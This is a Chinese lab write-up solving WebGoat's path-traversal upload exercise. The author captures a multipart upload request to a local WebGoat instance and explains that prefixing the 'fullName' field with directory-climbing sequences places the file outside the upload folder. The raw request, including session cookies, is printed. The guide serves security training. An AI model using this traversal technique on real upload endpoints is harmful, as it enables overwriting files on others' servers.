WEBGOAT靶场—Path traversal路径遍历第二关解析

WEBGOAT靶场介绍:

WebGoat是OWASP组织研制出的用于进行Web漏洞实验的Java靶场程序,用来说明Web应用中存在的安全漏洞。其中包括:HTTP拆分攻击、失效访问控制、AJAX安全、身份认证和会话管理、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)、注入、安全配置错误等。


首先来看看漏洞页面,通过题目提示得知是一道上传文件时遍历路径的题
在这个任务中,目标是覆盖文件系统上的特定文件。WebGoat当然关心用户 因此,您需要将文件上传到正常上传位置之外的以下位置。
那么我们需要上传文件到以下目录当中就能得出flag
C:\Users\Sec/.webgoat-8.1.0/PathTraversal/
在这里插入图片描述

尝试上传一张照片发现默认路径上传到
C:\Users\Sec.webgoat-8.1.0\PathTraversal\Wsec\test"
但是根据题目要求,需要上传目录至C:\Users\Sec/.webgoat-8.1.0/PathTraversal/ 对比两个路径可以发现只需要跳转两个上一级目录即可达到题目要求的效果。
在这里插入图片描述

于是我们可以抓包,修改数据包达到目录上一级跳转
在这里插入图片描述

POST /WebGoat/PathTraversal/profile-upload HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------14583636429655905603157264114
Content-Length: 88931
Origin: http://localhost:8090
Connection: close
Referer: http://localhost:8090/WebGoat/start.mvc
Cookie: JSESSIONID=iu9Es2dyhGJQZxVqboqLSnervHyVsaYzfvWSs-ca; UserName=xpcode; PassWord=e10adc3949ba59abbe56e057f20f883e; bjzH_2132_ulastactivity=a3f9tP7PHRuKqFTUZ%2Fq5yBXudCVdhbMCwqZPlxylzNyWk9etXq5R; Phpstorm-c9afe40e=5006de40-8c24-4520-9e7e-a4c62f328f5e

-----------------------------14583636429655905603157264114
Content-Disposition: form-data; name="uploadedFile"; filename="旺仔.jpg"
Content-Type: image/jpeg
#前面的数据包没有什么需要注意的,中间有一点乱码数据,我们直接看最后的几处数据包
-----------------------------14583636429655905603157264114
Content-Disposition: form-data; name="fullName"

test
-----------------------------14583636429655905603157264114
Content-Disposition: form-data; name="email"

test@test.com
-----------------------------14583636429655905603157264114
Content-Disposition: form-data; name="password"

test
-----------------------------14583636429655905603157264114--

-----------------------------14583636429655905603157264114
Content-Disposition: form-data; name="fullName"
test

通过代码审计可以发现传入了一个test文件,所以我们可以在test前加入目录跳转语句最后发包试试
可以看到已经成功通过这一关
Congratulations. You have successfully completed the assignment.

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旺仔Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值